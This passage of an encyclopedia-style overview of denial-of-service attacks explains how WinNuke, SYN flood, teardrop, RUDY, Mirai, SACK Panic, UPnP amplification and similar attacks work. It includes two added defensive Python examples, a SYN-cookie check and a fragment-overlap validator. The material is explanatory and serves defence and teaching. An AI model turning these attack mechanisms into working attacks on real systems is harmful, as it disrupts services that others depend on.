A specific example of a nuke attack that gained some prominence is the WinNuke, which exploited the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data was sent to TCP port 139 of the victim’s machine, causing it to lock up and display a Blue Screen of Death (BSOD).

Peer-to-peer attacks

Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC++. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a “puppet master,” instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim’s website instead.

Permanent denial-of-service attacks

Permanent denial-of-service (PDoS), also known loosely as phlashing, is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim’s hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device’s firmware with a modified, corrupt, or defective firmware image—a process which when done legitimately is known as flashing. This therefore “bricks” the device, rendering it unusable for its original purpose until it can be repaired or replaced.

The PDoS is a pure hardware targeted attack which can be much faster and requires fewer resources than using a botnet or a root/vserver in a DDoS attack. Because of these features, and the potential and high probability of security exploits on Network Enabled Embedded Devices (NEEDs), this technique has come to the attention of numerous hacking communities. BrickerBot, a piece of malware that targeted IoT devices, used PDoS attacks to disable its targets.

PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard’s Systems Security Lab) used to detect and demonstrate PDoS vulnerabilities at the 2008 EUSecWest Applied Security Conference in London.

Reflected / spoofed attack

A distributed denial-of-service attack may involve sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet Protocol address spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. (This reflected attack form is sometimes called a “DRDOS”.)

ICMP Echo Request attacks (Smurf attack) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack.

Mirai botnet

This attack works by using a worm to infect hundreds of thousands of IoT devices across the internet. The worm propagates through networks and systems, taking control of poorly protected IoT devices such as thermostats, Wi-Fi enabled clocks and washing machines. When a device becomes enslaved, the owner or user usually has no immediate indication. The IoT device itself is not the direct target of the attack; it is used as part of a larger attack. These newly enslaved devices are called slaves or bots. Once the hacker has acquired the desired number of bots, they instruct the bots to try to contact an ISP. In October 2016, a Mirai botnet attacked Dyn, which is the ISP for sites such as Twitter, Netflix, etc. As soon as this occurred, these websites were all unreachable for several hours. This type of attack is not physically damaging, but it will certainly be costly for any large internet companies that get attacked.

R-U-Dead-Yet? (RUDY)

The RUDY attack targets web applications by starving the web server of available sessions. Much like Slowloris, RUDY keeps sessions halted using never-ending POST transmissions and an arbitrarily large Content-Length header value.

SACK Panic

Manipulation of the maximum segment size and selective acknowledgement (SACK) may be used by a remote peer to cause a denial of service through an integer overflow in the Linux kernel, even resulting in a kernel panic. Jonathan Looney discovered CVE-2019-11477, CVE-2019-11478 and CVE-2019-11479 on June 17, 2019.

Shrew attack

The shrew attack is a denial-of-service attack on the Transmission Control Protocol where the attacker employs man-in-the-middle techniques. It uses short synchronized bursts of traffic to disrupt TCP connections on the same link, by exploiting a weakness in TCP’s re-transmission timeout mechanism.[73]

Slow Read attack

A slow read attack sends legitimate application layer requests, but reads responses very slowly, thus trying to exhaust the server’s connection pool. It is achieved by advertising a very small TCP receive window size and, at the same time, emptying the client’s TCP receive buffer slowly, which causes a very low data flow rate.

Sophisticated low-bandwidth Distributed Denial-of-Service Attack

A sophisticated low-bandwidth DDoS attack is a form of DoS that uses less traffic and increases its effectiveness by aiming at a weak point in the victim’s system design, i.e., the attacker sends traffic consisting of complicated requests to the system. Essentially, a sophisticated DDoS attack is lower in cost due to its use of less traffic, is smaller in size, making it more difficult to identify, and has the ability to hurt systems which are protected by flow control mechanisms.

(S)SYN flood

A SYN flood occurs when a host sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection by sending back a TCP/SYN-ACK packet (acknowledgement) and waiting for the ACK packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server can make, keeping it from responding to legitimate requests until after the attack ends.
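As an added illustration (not code from the page or from any kernel), the following Python sketch shows the standard SYN-cookie countermeasure to the half-open-connection exhaustion described above: the server keeps no per-SYN state and instead encodes a MAC over the connection 4-tuple into its initial sequence number, so only a client that actually received the SYN-ACK can complete the handshake. The secret, the MSS table and the bit layout are constructed for the demonstration.

```python
"""SYN-cookie sketch (added example; not the kernel's code, and the cookie
layout is a simplified, constructed one).

Instead of storing state for each SYN, the server encodes what it needs into
the initial sequence number (ISN) of its SYN-ACK. State is created only when
an ACK arrives whose acknowledgement number passes the cookie check, so a
forged-source SYN costs the server nothing but one reply packet.
"""
import hashlib
import hmac

SECRET = b"constructed-demo-secret"        # a real server rotates this regularly
MSS_TABLE = [536, 1220, 1440, 1460]        # candidate MSS values, encoded as an index


def _mac(src, dst, sport, dport, counter):
    msg = f"{src}|{dst}|{sport}|{dport}|{counter}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(src, dst, sport, dport, mss, minute):
    """Build the 32-bit ISN: 5 bits of time | 3 bits of MSS index | 24-bit MAC."""
    idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    t = minute & 0x1F
    return (t << 27) | (idx << 24) | _mac(src, dst, sport, dport, t)


def check_cookie(src, dst, sport, dport, ack, now_minute, max_age=2):
    """Validate the ACK that completes the handshake.

    Returns the MSS to use, or None if the cookie is forged or too old (the
    caller then drops the packet). The client acknowledges ISN+1, so the
    cookie is ack-1. The MAC is recomputed from the 4-tuple and the encoded
    minute; a sender that never saw the SYN-ACK cannot produce a match.
    """
    cookie = (ack - 1) & 0xFFFFFFFF
    t = cookie >> 27
    idx = (cookie >> 24) & 0x7
    mac = cookie & 0xFFFFFF
    if ((now_minute - t) & 0x1F) > max_age:
        return None
    expected = _mac(src, dst, sport, dport, t)
    if not hmac.compare_digest(mac.to_bytes(3, "big"), expected.to_bytes(3, "big")):
        return None
    return MSS_TABLE[idx] if idx < len(MSS_TABLE) else None
```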

Teardrop attacks

A teardrop attack involves sending mangled IP fragments with overlapping, oversized payloads to the target machine. This can crash various operating systems because of a bug in their TCP/IP fragmentation re-assembly code. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack.

(Although in September 2009, a vulnerability in Windows Vista was referred to as a “teardrop attack”, this targeted SMB2 which is a higher layer than the TCP packets that teardrop used).

One of the fields in an IP header is the “fragment offset” field, indicating the starting position, or offset, of the data contained in a fragmented packet relative to the data in the original packet. If the sum of the offset and size of one fragmented packet differs from that of the next fragmented packet, the packets overlap. When this happens, a server vulnerable to teardrop attacks is unable to reassemble the packets – resulting in a denial-of-service condition.
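To make the overlap rule concrete, here is an added Python check (not from the page) that a reassembler could apply before accepting a fragment set; the fragment offsets and byte counts are constructed sample values, with offsets already converted from the header's 8-byte units to bytes.

```python
"""Overlap check for IP fragment reassembly (added example, not from the page).

Each fragment is (offset, length, more) in bytes, where offset is the
fragment-offset field already multiplied by 8. A sane set covers [0, total)
with each fragment starting exactly where the previous one ended; a
teardrop-style set breaks that invariant and must be dropped, not reassembled.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Fragment:
    offset: int   # byte offset into the original datagram
    length: int   # payload bytes carried by this fragment
    more: bool    # IP "more fragments" (MF) flag


def check_fragments(frags, max_datagram=65535):
    """Return 'ok', or a reason string explaining why the set must be dropped.

    Rule from the text: sorted by offset, the end of one fragment
    (offset + length) must equal the start of the next. A smaller next offset
    means the payloads overlap; a larger one means a gap (incomplete).
    """
    if not frags:
        return "empty"
    ordered = sorted(frags, key=lambda f: f.offset)
    if ordered[0].offset != 0:
        return "first fragment does not start at offset 0"
    expected = 0
    for f in ordered:
        if f.length <= 0:
            return f"fragment at {f.offset} has non-positive length"
        if f.offset < expected:
            return f"overlap: fragment at {f.offset} starts before {expected}"
        if f.offset > expected:
            return f"gap: expected data at {expected}, got fragment at {f.offset}"
        expected = f.offset + f.length
        if expected > max_datagram:
            return f"oversized: reassembled length {expected} exceeds {max_datagram}"
    if ordered[-1].more:
        return "last fragment still has MF set (incomplete)"
    return "ok"


# Constructed sample inputs (not captured traffic).
GOOD = [Fragment(0, 1480, True), Fragment(1480, 1480, True), Fragment(2960, 500, False)]
TEARDROP = [Fragment(0, 1480, True), Fragment(800, 1480, False)]  # second starts inside first
```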

Telephony denial-of-service (TDoS)

Voice over IP has made abusive origination of large numbers of telephone voice calls inexpensive and readily automated while permitting call origins to be misrepresented through caller ID spoofing.

TTL expiry attack

It takes more router resources to drop a packet with a TTL value of 1 or less than it does to forward a packet with higher TTL value. When a packet is dropped due to TTL expiry, the router CPU must generate and send an ICMP time exceeded response. Generating many of these responses can overload the router’s CPU.

UPnP attack

This attack uses an existing vulnerability in the Universal Plug and Play (UPnP) protocol to get around a considerable number of present defense methods and flood a target’s network and servers. The attack is based on a DNS amplification technique, but the attack mechanism is a UPnP router which forwards requests from one outer source to another, disregarding UPnP behavior rules. Using the UPnP router returns the data on an unexpected UDP port from a bogus IP address, making it harder to take simple action to shut down the traffic flood. According to the Imperva researchers, the most effective way to stop this attack is for companies to lock down UPnP routers.